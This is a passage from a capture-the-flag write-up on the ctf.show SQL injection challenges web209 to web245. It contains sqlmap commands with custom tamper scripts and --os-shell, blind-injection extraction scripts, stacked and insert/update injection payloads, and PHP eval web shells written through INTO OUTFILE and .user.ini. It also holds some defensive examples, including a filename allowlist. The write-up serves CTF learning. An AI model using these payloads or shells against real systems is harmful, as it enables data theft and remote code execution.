sqlmap -u "http://bff19190-d1db-48b9-985b-0927820224f5.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql --dump --headers="Content-Type: text/plain" --safe-url="http://bff19190-d1db-48b9-985b-0927820224f5.challenge.ctf.show/api/getToken.php" --tamper=space2comment --safe-freq=1 --batch
```

web209

Challenge

Third taste of --tamper.

Solution

Write a custom tamper script.

```
sqlmap -u http://004c0fcd-8698-4f48-8de6-05e807fdb9aa.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show  --headers="Content-Type:text/plain" --safe-url="http://004c0fcd-8698-4f48-8de6-05e807fdb9aa.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web -T ctfshow_flav --dump  --tamper=web209 --batch
```

```python
#!/usr/bin/env python

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def tamper(payload, **kwargs):
    payload = space2comment(payload)
    return payload

def space2comment(payload):
    # adapted from sqlmap's space2comment tamper: spaces outside quotes become
    # tabs (0x09) and '=' becomes 'like', so neither character reaches the filter
    retVal = payload
    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x09)
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == '=':
                retVal += chr(0x09) + 'like' + chr(0x09)
                continue

            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x09)
                continue

            retVal += payload[i]

    return retVal
```

Save this as web209.py in sqlmap's tamper/ directory.

web210

Challenge

Fourth taste of --tamper.

Solution

```
sqlmap -u http://c361749f-0ae7-4380-bee1-c9660ecfc032.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show  --headers="Content-Type:text/plain" --safe-url="http://c361749f-0ae7-4380-bee1-c9660ecfc032.challenge.ctf.show/api/getToken.php" --safe-freq=1 --dump --tamper=web210 --batch
```

```python
#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY
from base64 import b64encode

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    # the server decodes with strrev(base64_decode(strrev(base64_decode($id)))),
    # so apply the inverse: reverse, base64, reverse, base64
    retVal = payload
    if payload:
        retVal = retVal.replace("-- -", "#")
        retVal = b64encode("".join(reversed(retVal)).encode('utf-8')).decode('utf-8')
        retVal = b64encode("".join(reversed(retVal)).encode('utf-8')).decode('utf-8')

    return retVal
```

The encoding is simply the server's decode() run backwards.

web211

Challenge

Fifth taste of --tamper.

```php
// decode the query parameter
function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
}
function waf($str){
    return preg_match('/ /', $str);
}
```

Solution

```
sqlmap -u http://6403248a-8fe5-4725-aa50-32bae320a928.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show  --headers="Content-Type:text/plain" --safe-url="http://6403248a-8fe5-4725-aa50-32bae320a928.challenge.ctf.show/api/getToken.php" --safe-freq=1 --dump --tamper=web211 --batch
```

This challenge filters the space; replace it with /**/ before encoding.

```python
#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY
from base64 import b64encode

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    # spaces are filtered after decoding, so swap them for /**/ first,
    # then apply the same reverse/base64/reverse/base64 encoding as web210
    retVal = payload
    if payload:
        retVal = retVal.replace(" ", "/**/")
        retVal = b64encode("".join(reversed(retVal)).encode('utf-8')).decode('utf-8')
        retVal = b64encode("".join(reversed(retVal)).encode('utf-8')).decode('utf-8')

    return retVal
```

web212

Challenge

Sixth taste of --tamper.

```php
function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
}
function waf($str){
    return preg_match('/ |\*/', $str);
}
```

Solution

Both the space and * are filtered now, so /**/ is out; use a newline (0x0a) as the separator instead, then apply the double reverse-and-base64 encoding.

```
sqlmap -u http://f37c0235-580a-413c-9049-b969dda22cbd.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show  --headers="Content-Type:text/plain" --safe-url="http://f37c0235-580a-413c-9049-b969dda22cbd.challenge.ctf.show/api/getToken.php" --safe-freq=1 --dump --tamper=web212 --batch
```

```python
#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
from base64 import b64encode

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def space2comment(payload):
    # variant of sqlmap's space2comment: spaces outside quotes become newlines
    # (0x0a), '*' becomes '1' (so count(*) turns into count(1)) and '=' becomes 'like'
    retVal = payload
    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x0a)
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == "*":
                retVal += chr(0x31)
                continue

            elif payload[i] == "=":
                retVal += chr(0x0a) + 'like' + chr(0x0a)
                continue

            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x0a)
                continue

            retVal += payload[i]

    return retVal


def tamper(payload, **kwargs):
    payload = space2comment(payload)
    retVal = payload
    if payload:
        retVal = retVal.replace(" ", "/**/")
        retVal = b64encode("".join(reversed(b64encode("".join(reversed(retVal)).encode('utf-8')).decode('utf-8'))).encode('utf-8')).decode('utf-8')

    return retVal
```

The encoding line, step by step:
  1. "".join(reversed(retVal)): reverse the characters of retVal.
  2. b64encode("".join(reversed(retVal)).encode('utf-8')): base64-encode the reversed string.
  3. b64encode("".join(reversed(b64encode(...).decode('utf-8'))).encode('utf-8')): reverse the base64 text from step 2 and base64-encode it a second time.
  4. decode('utf-8'): turn the doubly encoded bytes back into a str for sqlmap.

The same encoding can be written more readably with slicing:

```python
import base64

if payload:
    retVal = base64.b64encode(payload[::-1].encode('utf-8'))
    retVal = base64.b64encode(retVal[::-1]).decode('utf-8')
```

  1. if payload:: skip empty payloads (sqlmap may call tamper() with None); nothing inside the block runs in that case.
  2. retVal = base64.b64encode(payload[::-1].encode('utf-8')): payload[::-1] reverses the string, encode('utf-8') turns it into bytes, base64.b64encode() encodes those bytes; the result is stored in retVal.
  3. retVal = base64.b64encode(retVal[::-1]).decode('utf-8'): retVal[::-1] reverses the base64 bytes, base64.b64encode() encodes them a second time, decode('utf-8') yields the final string, again stored in retVal.
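The following is an added example, not code from the writeup or from sqlmap: the client-side encoder behind the web210 to web212 tamper scripts together with Python ports of the challenge's decode() and web212's waf(), so the whole round trip (transform, encode, server-side decode, filter) can be checked offline without sqlmap. latin-1 is used for the byte conversions so that reversing a Python str reverses bytes exactly like PHP's strrev().

```python
import base64

# Added example (not from the writeup or from sqlmap): the client-side
# encoder behind the web210-web212 tamper scripts, plus Python ports of the
# challenge's decode() and web212's waf() so the round trip can be checked
# offline. latin-1 is used so that reversing a str reverses bytes exactly
# like PHP's strrev().


def server_decode(encoded):
    """Port of decode($id): strrev(base64_decode(strrev(base64_decode($id))))."""
    inner = base64.b64decode(encoded).decode("latin-1")[::-1]
    return base64.b64decode(inner).decode("latin-1")[::-1]


def server_waf_212(decoded):
    """Port of web212's waf(): preg_match('/ |\\*/', $str). True means blocked."""
    return " " in decoded or "*" in decoded


def encode_payload(payload):
    """Inverse of server_decode(): reverse, base64, reverse, base64."""
    first = base64.b64encode(payload[::-1].encode("latin-1")).decode("latin-1")
    return base64.b64encode(first[::-1].encode("latin-1")).decode("latin-1")


def evade_web212(payload):
    """The web212 transformation: newlines are whitespace to MySQL but are not
    matched by the filter, so every space becomes 0x0a. A payload that still
    contains '*' (e.g. /**/ or count(*)) needs rewriting on top of this."""
    return payload.replace(" ", "\n")


if __name__ == "__main__":
    p = "1 or 1=1"
    print(server_waf_212(p))                           # True: blocked as-is
    enc = encode_payload(evade_web212(p))
    print(repr(server_decode(enc)))                    # '1\nor\n1=1'
    print(server_waf_212(server_decode(enc)))          # False: passes
```

The check the filter should have done is the one this example makes obvious: decode first, then validate (or better, bind) the decoded value; matching a regex on a transport encoding proves nothing about what the database will execute.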

web213

Challenge

Practice --os-shell for a one-step shell.

```php
// decode the query parameter
function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
}
function waf($str){
    return preg_match('/ |\*/', $str);
}
```

Solution

How --os-shell works

Against MySQL, --os-shell boils down to writing two PHP files into the web root: the first (named like tmpugvzq.php) is a file uploader, which sqlmap uses to upload the second (named like tmpbylqf.php), a command executor; sqlmap then sends commands to that file and relays the output back to its own prompt. It therefore has the same preconditions as an into outfile write: the FILE privilege, a secure_file_priv that allows the directory, a web root that is writable by the database process, and knowledge of its path.

```
sqlmap -u http://d2f177c1-6ddc-4f4f-94a9-2dd51684a10a.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show  --headers="Content-Type:text/plain" --safe-url="http://d2f177c1-6ddc-4f4f-94a9-2dd51684a10a.challenge.ctf.show/api/getToken.php" --safe-freq=1 --os-shell  --tamper=web212 --batch
```

```
sqlmap -u "http://d2f177c1-6ddc-4f4f-94a9-2dd51684a10a.challenge.ctf.show/api/index.php" --method="PUT" \
    --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --cookie="PHPSESSID=j6fo9qlp4cqpi7hc632ais5pqu" \
    --safe-url="http://d2f177c1-6ddc-4f4f-94a9-2dd51684a10a.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web212 --os-shell
```

web214

Challenge

Time-based blind injection, no filtering.

Solution

Run a script:

```python
import requests

url = "http://7a6a7ff4-b343-407a-bc3f-de5ebae96b51.challenge.ctf.show/api/"

# table names
#payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{},sleep(2),0)"
# if(): when the comparison holds, sleep(2) delays the query; otherwise it returns 0
# ascii(): compares the extracted character's code with the probe value {} (binary search)
# substr(): takes the single character at position {}
# select group_concat(table_name) from information_schema.tables where table_schema=database():
#   all table names of the current database, joined into one string

# result: ctfsho_flagx,ctfshow_info

# column names
#payload = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'),{},1))>{},sleep(2),0)"
# same shape: group_concat(column_name) from information_schema.columns, filtered by table_name

payload = "if(ascii(substr((select group_concat(flaga) from ctfshow_flagxc),{},1))>{},sleep(2),0) and '1'='1"
# read the value of flaga

i = 0
result = ""

while True:
    i += 1
    head = 0
    tail = 127
    # binary search; invariant: head <= ord(char) <= tail
    while head < tail:
        mid = (head + tail) // 2
        data = {
            "debug": 1,
            "ip": payload.format(i, mid)
        }
        try:
            # answered within the timeout: sleep() did not fire, so char <= mid
            response = requests.post(url=url, data=data, timeout=2)
            tail = mid
        except Exception as e:
            # timed out: sleep(2) fired, so char > mid
            head = mid + 1
    # ascii('') past the end of the string is 0: done
    if head == 0:
        break
    result += chr(head)
    print(result.lower())
```

web215

Challenge

The parameter is wrapped in single quotes, so the injection has to close the quote and comment out the rest.

Solution

Adjust the payload of the previous script: open with `1'` and finish with either a comment or `and '1'='1` to re-balance the quote:

```
1' or if()>{},sleep(2),0) and '1'='1
```

```python
import requests

url = "http://c412a173-066e-4c22-a651-5b41a47124d1.challenge.ctf.show/api/"

# table names
#payload = "1' or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{},sleep(2),0) and '1'='1"
# if(): when the comparison holds, sleep(2) delays the query; otherwise it returns 0
# ascii(): compares the extracted character's code with the probe value {} (binary search)
# substr(): takes the single character at position {}
# select group_concat(table_name) from information_schema.tables where table_schema=database():
#   all table names of the current database, joined into one string

# result: ctfshow_flagxc

# column names
#payload = "1' or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{},1))>{},sleep(2),0)#"
# same shape: group_concat(column_name) from information_schema.columns, filtered by table_name
# result: id,flagaa,info
payload = "1' or if(ascii(substr((select group_concat(flagaa) from ctfshow_flagxc),{},1))>{},sleep(2),0)-- +"
# read the value of flagaa

i = 0
result = ""

while True:
    i += 1
    head = 0
    tail = 127
    # binary search; invariant: head <= ord(char) <= tail
    while head < tail:
        mid = (head + tail) // 2
        data = {
            "debug": 1,
            "ip": payload.format(i, mid)
        }
        try:
            # answered within the timeout: sleep() did not fire, so char <= mid
            response = requests.post(url=url, data=data, timeout=2)
            tail = mid
        except Exception as e:
            # timed out: sleep(2) fired, so char > mid
            head = mid + 1
    # ascii('') past the end of the string is 0: done
    if head == 0:
        break
    result += chr(head)
    print(result.lower())
# two runs; the first misread one character (g instead of f), a typical
# time-based false positive caused by network jitter:
#ctfshow{841c7380-86e8-4059-906d-d6fg06a17a21}
#ctfshow{841c7380-86e8-4059-906d-d6ff06a17a21}
```

web216

Challenge

The parameter sits inside a function call, so a parenthesis has to be closed:

```
where id = from_base64($id);
```

Solution

```python
import requests

url = "http://7c369116-52db-4f1e-83e6-1588d920cabe.challenge.ctf.show/api/"

# table names
#payload = "1) or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{},sleep(2),0)#"
# if(): when the comparison holds, sleep(2) delays the query; otherwise it returns 0
# ascii(): compares the extracted character's code with the probe value {} (binary search)
# substr(): takes the single character at position {}
# select group_concat(table_name) from information_schema.tables where table_schema=database():
#   all table names of the current database, joined into one string

# result: ctfshow_flagxc

# column names
#payload = "1' or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{},1))>{},sleep(2),0)#"
# same shape: group_concat(column_name) from information_schema.columns, filtered by table_name
# result: id,flagaa,info
payload = "1) or if(ascii(substr((select group_concat(flagaac) from ctfshow_flagxcc),{},1))>{},sleep(2),0)#"
# read the value of flagaac

i = 0
result = ""

while True:
    i += 1
    head = 0
    tail = 127
    # binary search; invariant: head <= ord(char) <= tail
    while head < tail:
        mid = (head + tail) // 2
        data = {
            "debug": 1,
            "ip": payload.format(i, mid)
        }
        try:
            # answered within the timeout: sleep() did not fire, so char <= mid
            response = requests.post(url=url, data=data, timeout=2)
            tail = mid
        except Exception as e:
            # timed out: sleep(2) fired, so char > mid
            head = mid + 1
    # ascii('') past the end of the string is 0: done
    if head == 0:
        break
    result += chr(head)
    print(result.lower())
```

web217

Challenge

```php
function waf($str){
    return preg_match('/sleep/i',$str);
}
```

sleep() is filtered; find another way to stall the query.

Solution

Instead of sleep(), force a heavy computation: a Cartesian product of information_schema tables (count(*) over several cross joins) takes long enough to trip the client timeout. The script is not a binary search: it appends each candidate character to the known prefix and treats a timeout as a hit.

```python
# Not a binary search: append each candidate to the known prefix and probe;
# a timeout means the heavy query ran, i.e. the character matched.
import requests
url = "http://6ebacf65-2af6-42e6-bd95-ff4801db4efa.challenge.ctf.show/api/"

strr = "ctfshow{}1234567890-qeryuipadgjklzxvbnm"
#payload = "select table_name from information_schema.tables where table_schema=database() limit 0,1"
# LIMIT 0, 1 selects one row starting at offset 0, i.e. only the first row
payload = "select flagaabc from ctfshow_flagxccb"
j = 1
res = ""
while 1:
    for i in strr:
        # the if() is left open on purpose: the original query's closing
        # parenthesis completes it
        data = {
            'ip': f"1) or if(substr(({payload}),{j},1)='{i}',(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I),1",
            'debug': '1'
        }
        try:
            r = requests.post(url, data=data, timeout=3)
        except Exception as e:
            res += i
            print(res)
            j += 1
            if i == '}':
                raise SystemExit
```

web218

Challenge

Solution

The web217 script works here unchanged: the same heavy-query timing approach applies.

web219

Challenge

// block dangerous elements
function waf($str){
    return preg_match('/sleep|benchmark|rlike/i',$str);
}

The Cartesian product still works here.

Solution

import requests
url = "http://dbdee4c3-4fe3-46e9-98fc-cb990b62784f.challenge.ctf.show/api/"

strr = "_1234567890{}-qazwsxedcrfvtgbyhnujmikolp"
# payload = "select table_name from information_schema.tables where table_schema=database() limit 0,1"
# payload = "select column_name from information_schema.columns where table_name='ctfshow_flagxca' limit 1,1"
payload = "select flagaabc from ctfshow_flagxca"
j = 1
res = ""
while 1:
    found = False
    for i in strr:
        data = {
            'ip': f"1) or if(substr(({payload}),{j},1)='{i}',(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I),1",
            'debug': '1'
        }
        # print(i)
        try:
            r = requests.post(url, data=data, timeout=3)
        except Exception as e:
            # a timeout means the heavy cross join ran, i.e. this character matched
            res += i
            print(res)
            j+=1
            found = True
            break
    if not found:
        # no character matched at this position: end of the string
        break

# unconditional version of the heavy query, useful to confirm the delay on its own
# data = {
#     'ip': f"1) or if(1=1,(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I),1",
#     'debug': '1'
# }
# r = requests.post(url, data=data, timeout=3)

It may produce a wrong flag; just run it a few more times.

web220

Challenge

Use ord instead of ascii

Use locate instead of substr

Use the Cartesian product

function waf($str){
    return preg_match('/sleep|benchmark|rlike|ascii|hex|concat_ws|concat|mid|substr/i',$str);
}

Solution

web221

Challenge

Moving on to other kinds of injection

The challenge says we only need to get the database name

Solution

payload

http://77f44211-91d3-49d7-8fa4-edeb58af4117.challenge.ctf.show/api/?page=2&limit=1%20procedure%20%20analyse(extractvalue(rand(),concat(0x3a,database())),1)

web222

Challenge

The query:

//paged query
$sql = select * from ctfshow_user group by $username;

Solution

import requests

url = "http://3544e733-8273-45fa-aa1f-1d1d2c6dd5ad.challenge.ctf.show/api/"

# payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{},username,0)"
# gives ctfshow_flaga,ctfshow_user
# payload = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flaga'),{},1))>{},username,0)"
# gives id,flagaabc,info
payload = "if(ascii(substr((select group_concat(flagaabc) from ctfshow_flaga),{},1))>{},username,0)"
# gives the flag
result = ""
i = 0

while True:
    i += 1
    head = 0
    tail = 127
    # binary search on the ASCII value of character i
    while head<tail:
        mid = (head+tail)//2
        param = {
            "u" : payload.format(i,mid),
        }
        response = requests.get(url=url,params=param)
        if "passwordAUTO" in response.text:
            head = mid+1
        else:
            tail = mid
    if head==0:
        break
    result += chr(head)
    print(result)

web223

Challenge

Much like the previous one, but this time digits are filtered

Use True in place of 1

Solution

# Author: yanmie

import requests

url = "http://d327989c-3ab5-429d-93ad-4cddaded94ba.challenge.ctf.show/api/"
# payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},{}))>{},username,'a')"
# gives ctfshow_flagas,ctfshow_user
# payload = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagas'),{},{}))>{},username,'a')"
# gives id,flagasabc,info
payload = "if(ascii(substr((select group_concat(flagasabc) from ctfshow_flagas),{},{}))>{},username,'a')"
# gives the flag
result = ""
i = 0

def createNum(num):
    # express num as True+True+... because digits are filtered
    if num==1:
        return True
    else:
        res = "True"
        for _ in range(num-1):
            res += "+True"
        return res

while True:
    i += 1
    head = 0
    tail = 127
    while head<tail:
        mid = (head+tail)//2
        params = {
            "u" : payload.format(createNum(i),createNum(1),createNum(mid)),
        }
        response = requests.get(url=url,params=params)
        if "passwordAUTO" in response.text:
            head = mid+1
        else:
            tail = mid
    if head == 0 :
        print("[+]the result is : ",result)
        break
    result += chr(head)
    print(result)

web224

Challenge

I don't know how to do this one

Solution

web225

Challenge

Stacked injection, step up: basic difficulty

//the master says the more you filter the better
if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set/i',$username)){
    die(json_encode($ret));
}

Solution

Solution 1

show is not filtered though, so it can be combined with handler to read the data

/api/?username=1';show tables;

/api/?username=1';show tables;handler ctfshow_flagasa open;handler ctfshow_flagasa read first;

Solution 2

Prepared statements

/api/?username=1';show tables;PREPARE atlant1c from concat('sel','ect database()');EXECUTE atlant1c;
/api/?username=1';show tables;PREPARE atlant1c from concat('sel','ect * from ctfshow_flagasa');EXECUTE atlant1c;

web226

Challenge

Stacked injection, step up: intermediate difficulty

//the master says the more you filter the better
if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set|show|\(/i',$username)){
    die(json_encode($ret));
}

show and ( are banned too

Solution

Use hex encoding

/api/?username=1';PREPARE atlant1c from 0x73686F77207461626C6573;EXECUTE atlant1c;
/api/?username=1';PREPARE atlant1c from 0x73656C656374202A2066726F6D2063746673685F6F775F666C61676173;EXECUTE atlant1c;

web227

Challenge

Stacked injection, step up: advanced difficulty

//the master says the more you filter the better
if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set|show|db|\,/i',$username)){
    die(json_encode($ret));
}

Solution

Query information_schema.Routines. This is a MySQL system table that holds the details of every stored procedure and function: name, parameters, return value, creation and modification time, character set and so on. Querying it is a convenient way to see every stored procedure and function in the database, which helps with managing and maintaining it. Note that it does not contain trigger information.

/api/?username=1';PREPARE atlant1c from 0x73656c656374202a2066726f6d20696e666f726d6174696f6e5f736368656d612e726f7574696e6573;EXECUTE atlant1c;

Then the getflag() function shows up directly, together with its return value.

web228-web230

All of them can be bypassed with hex encoding

In each case query the columns first

web231-web232

Challenge

//paged query
$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

Solution

Get the table names

password=1',username=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where 1=1#&username=1

Get the column names

password=1',username=(select group_concat(column_name) from information_schema.columns where table_name='flaga') where 1=1#&username=1

Get the flag

password=1',username=(select flagas from flaga) where 1=1#&username=1

web233

Challenge

Time-based blind injection

Solution

# @Author: yanmie

import requests

url = "http://97240940-d8ac-45e4-92f4-4d4baeb81d18.chall.ctf.show/api/"
# payload = "ctfshow' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{},sleep(0.5),1) and '1'='1"
# gives banlist,ctfshow_user,flag233333
# payload = "ctfshow' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag233333'),{},1))>{},sleep(0.5),1) and '1'='1"
# gives id,flagass233,info
payload = "ctfshow' and if(ascii(substr((select group_concat(flagass233) from flag233333),{},1))>{},sleep(0.5),1) and '1'='1"

result = ""
i = 0

while True:
    i += 1
    head = 0
    tail = 127
    while head<tail:
        mid = (head+tail)//2
        data = {
            "password" : 1,
            "username" : payload.format(i,mid),
        }
        try:
            response = requests.post(url=url,data=data,timeout=0.5)
            tail = mid
        except Exception as e:
            # timed out, so sleep(0.5) ran: the character is greater than mid
            head = mid+1
    if head == 0:
        print("[+]the result is : ",result)
        break
    result += chr(head)
    print(result)

web234

Challenge

$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

Single quotes can no longer be used, but passing \ as the password puts the rest of the statement under our control

Solution

password=\&username=,username=(select flagass23s3 from flag23a)#

web235-web236

Challenge

$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

or and ' are filtered

Solution

Reportedly this is column-name-less injection

I didn't manage to solve it

# username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())-- - &password=\

web237

Challenge

insert injection

//insert data
$sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";

Solution

First get the table names

username=3',(select group_concat(table_name) from information_schema.tables where table_schema=database()));-- A&password=1

This gives banlist,ctfshow_user,flag

Then get the column names

username=3',(select group_concat(column_name) from information_schema.columns where table_name='flag'));-- A&password=1

Get the column

username=3',(select flagass23s3 from flag));-- A&password=1

web238

Challenge

Still insert injection, but this time spaces are filtered

//insert data
$sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";

Solution

username=3',(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())));#
username=3',(select(group_concat(column_name))from(information_schema.columns)where(table_name='flagb')));#&password=1
username=3',(select(flag)from(flagb)));#&password=1

Parentheses replace the spaces, and # closes the statement

web239

Challenge

//insert data
$sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";

This time spaces and or are filtered

Solution

Get the tables

1',(select(group_concat(table_name))from(mysql.innodb_table_stats)where(database_name=database())))#
1',(select(group_concat(column_name))from(mysql.innodb_table_stats)where(table_name=flagbb)))#

web240

Challenge

Hint: the table name is 9 characters long, starts with flag, and the last five characters are made of a/b, e.g. flagabaab, all lowercase

//filters spaces, or, sys, mysql

Solution

Script

import itertools
import requests

kk = "ab"
url1 = "http://bccdb51c-955b-410c-9213-7558f1e6d85a.challenge.ctf.show/api/insert.php"
url2 = "http://bccdb51c-955b-410c-9213-7558f1e6d85a.challenge.ctf.show/api/?page=1&limit=100"
# try every 5-character a/b suffix until the listing page shows the flag
for combo in itertools.product(kk, repeat=5):
    flag = "flag" + "".join(combo)
    print(flag)
    data = {
        'username': "yn8rt',(select(group_concat(flag))from({})));#".format(flag),
        'password': 1
    }
    res = requests.post(url=url1, data=data).text

    r = requests.get(url=url2).text
    print(r)
    if "ctfshow{" in r:
        print(res)
        exit()

web241

delete injection. Other write-ups say it is time-based blind, but my script did not work, so the unintended solution has presumably been banned

web242

Challenge

File read/write

//back up the table
$sql = "select * from ctfshow_user into outfile '/var/www/html/dump/{$filename}';";

Solution

Use the extended options of INTO OUTFILE to solve this one.

SELECT ... INTO OUTFILE 'file_name'
    [CHARACTER SET charset_name]
    [export_options]

export_options:
    [{FIELDS | COLUMNS}
        [TERMINATED BY 'string']   //delimiter
        [[OPTIONALLY] ENCLOSED BY 'char']
        [ESCAPED BY 'char']
    ]
    [LINES
        [STARTING BY 'string']
        [TERMINATED BY 'string']
    ]

The "OPTION" parameters are optional; their possible values are:

FIELDS TERMINATED BY 'string': sets the string used as the separator between fields; may be one or more characters. The default is "\t".

FIELDS ENCLOSED BY 'char': sets the character used to quote field values; must be a single character. By default no character is used.

FIELDS OPTIONALLY ENCLOSED BY 'char': sets the character used to quote character-type fields such as CHAR, VARCHAR and TEXT. By default no character is used.

FIELDS ESCAPED BY 'char': sets the escape character; must be a single character. The default is "\".

LINES STARTING BY 'string': sets the characters written at the start of each row; may be one or more characters. By default none are used.

LINES TERMINATED BY 'string': sets the characters written at the end of each row; may be one or more characters. The default is "\n".

The options through which a shell can be written are:

FIELDS TERMINATED BY, LINES STARTING BY, LINES TERMINATED BY

Write the shell via url/api/dump.php

The shell ends up at url/dump/1.php

filename=1.php' LINES STARTING BY "<?php eval($_POST[1]);?>";#

web243

Challenge

Return logic

//php is filtered

Solution

The previous challenge's payload needed the string php, which is now blocked. Whether phtml works is unclear, but the key point of this challenge is .user.ini: auto_append_file=1.png or auto_prepend_file=1.png

A refresher on the previous challenge's options:

FIELDS TERMINATED BY: sets the string used as the separator between fields; may be one or more characters. The default is "\t".

LINES STARTING BY 'string': sets the characters written at the start of each row; may be one or more characters. By default none are used.

LINES TERMINATED BY 'string': sets the characters written at the end of each row; may be one or more characters. The default is "\n".

payload:

First the ini:

filename=.user.ini' lines starting by 'auto_append_file="a.png";'%23

Note: hex encoding is used so that 0a (newline) takes effect, and starting by ";" makes every row begin with a semicolon, which cuts whatever select * from ctfshow_user returns off from what follows.

Then the png shell:

filename=1.png' LINES TERMINATED BY

filename=a.png' lines starting by '<?=eval($_POST[1]);?>'%23

When connecting, note the path is /dump/index.php
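For web242 and web243 the root cause is that the filename is spliced straight into INTO OUTFILE, where it cannot be bound as a query parameter. An added example, not part of this write-up or the challenge source: the challenge's query builder next to a hardened version that allowlists the filename (SAFE_NAME, the function names and the CASES inputs are my own), checked against the payload shapes from these two challenges with the shell body replaced by a placeholder.

```python
import re

# Allowlist for the backup filename: one bare name plus an extension the dump
# endpoint needs. It rules out everything the web242/web243 payloads rely on:
# the quote that closes the INTO OUTFILE literal, path separators, and a
# leading dot (.user.ini). The pattern and function names are my own.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]{0,31}\.(?:csv|txt)$")

DUMP_DIR = "/var/www/html/dump/"


def dump_sql_vulnerable(filename):
    """The challenge's query as the write-up shows it: filename spliced in."""
    return f"select * from ctfshow_user into outfile '{DUMP_DIR}{filename}';"


def dump_sql_hardened(filename):
    """Same query, but the name is validated first. INTO OUTFILE takes a
    string literal that no driver binds as a parameter, so an allowlist is
    the control here; secure_file_priv and withholding the FILE privilege
    are the server-side layers on top of it."""
    if not SAFE_NAME.fullmatch(filename):
        raise ValueError(f"rejected filename: {filename!r}")
    return f"select * from ctfshow_user into outfile '{DUMP_DIR}{filename}';"


# Constructed inputs: the two payload shapes from web242/web243 with the
# shell body replaced by a placeholder, a traversal attempt, and two
# legitimate names. The value is whether the hardened builder should accept it.
CASES = {
    "1.php' LINES STARTING BY \"PLACEHOLDER\";#": False,
    ".user.ini' lines starting by 'auto_append_file=\"a.png\";'#": False,
    "../index.php": False,
    "users-2023.csv": True,
    "backup.txt": True,
}


def check_all(cases=CASES):
    """Map each input to whether dump_sql_hardened accepted it."""
    accepted = {}
    for name in cases:
        try:
            dump_sql_hardened(name)
            accepted[name] = True
        except ValueError:
            accepted[name] = False
    return accepted


if __name__ == "__main__":
    first = next(iter(CASES))
    print("vulnerable :", dump_sql_vulnerable(first))
    print("hardened   :", check_all())
```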

web244-web245

Challenge

Error-based injection

Solution

The two forms of error-based injection:

extractvalue(target XML document, XML path): function that queries an XML document

